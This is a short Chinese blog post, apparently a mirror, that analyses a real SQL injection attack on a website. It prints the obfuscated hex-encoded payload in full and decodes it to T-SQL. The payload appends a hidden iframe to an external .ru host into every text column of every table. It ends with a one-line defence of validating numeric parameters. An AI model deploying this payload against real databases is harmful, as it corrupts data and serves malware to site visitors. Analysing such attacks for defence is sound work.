zoukankan      html  css  js  c++  java

  • 网站注入

    注入代码

    ;dECLaRe%20@s%20vArchAR(4000);SEt%20@S=Cast(0X4445634C615245204074205661526368615228323535292C404320564152434861722832353529206445436C617245207441424C655F437552734F5220635552536F7220466F722073654C65437420412E6E616D652C622E6E614D452046724F4D207379736F626A6543547320412C735973634F6C556D6E73204220774845726520412E69643D622E696420614E6420612E58545970653D27752720616E442028622E58747970653D3939204F7220622E78747970453D3335206F5220622E78747950453D323331204F7220622E58747950453D31363729206F50456E205461424C455F635552736F52204665544368204E4578542066724F4D207441626C455F437572736F5220496E546F2040742C4043205748694C6528404066455463485F5354417475733D302920626567494E20457845632827755044415465205B272B40742B275D20534574205B272B40632B275D3D525472694D28436F6E5665725428766152636841522834303030292C5B272B40432B275D29292B6341535428307833433639363637323631364436353230373337323633334432323638373437343730334132463246364536353644364636383735363936433634363936393645324537323735324637343634373332463637364632453730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323634363937333730364336313739334136453646364536353232334533433246363936363732363136443635334520415320766172636861522831303629292729204645746368204E4558542046524F4D205461424C455F437572734F5220696E546F2040742C406320654E6420636C4F5345207461624C455F435552736F52206445616C4C4F63415445207441426C455F637572734F7220%20aS%20vArCHAR(4000));Exec(@S);

    用SQL返转过来是

    declArE @T vaRChar(255),@C vARchaR(255) decLarE taBle_cUrsOr CuRSor For select a.nAMe,b.namE froM sYsoBjeCTs a,sYsCOLumNs b wheRE a.id=b.Id aND A.XtYpe='U' aNd (B.XType=99 or b.xtyPE=35 Or b.xTYpE=231 oR B.XTYPe=167) OPEN tAbLe_cUrsor FETch nEXT FroM TAbLe_cuRsoR iNTO @T,@C wHile(@@fetCH_staTuS=0) BEgIN ExeC('UPdAte ['+@t+'] Set ['+@c+']=RtrIm(CONvert(varchAr(4000),['+@c+']))+cAst(0x3C696672616D65207372633D22687474703A2F2F6E7574636F756E7472792E72753A383038302F696E6465782E7068703F7069643D3133222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E AS vARCHAR(109))') fEtCH NeXT FroM tAble_cursor InTo @T,@c End CLose TABLe_cURsor deALlOcaTE taBLE_cUrsor
    里面的cAst(0x返转过来是

    <iframe src="http://nutcountry.ru:8080/index.php?pid=13" width="0" height="0" style="display:none"></iframe>
    这种注入方式是在地址栏注入在页面传参的地方执行这个方法 在接受参数时判断是不是数字 如果是传字符替换换关键字。
  • 相关阅读:
    7、JsonCpp简单使用(3)
    8、mysql外键(FOREIGN KEY)的简单使用
    7、mysql创建数据库失败,提示Access denied for user ''@'localhost'
    6、JsonCpp简单使用(2)
    ASP.NET2.0快速入门--高级数据方案(3)
    DELL电脑系统恢复出常值
    一步一步学习ObjectDataSource(1)
    来自微软的ASP.NET2.0开源代码
    ASP.NET2.0 Person Web Site:将图片以二进制的从数据库读取
    ASP.NET2.0快速入门--高级数据方案(中)
  • 原文地址:https://www.cnblogs.com/freexiaoyu/p/1809884.html
Copyright © 2011-2022 走看看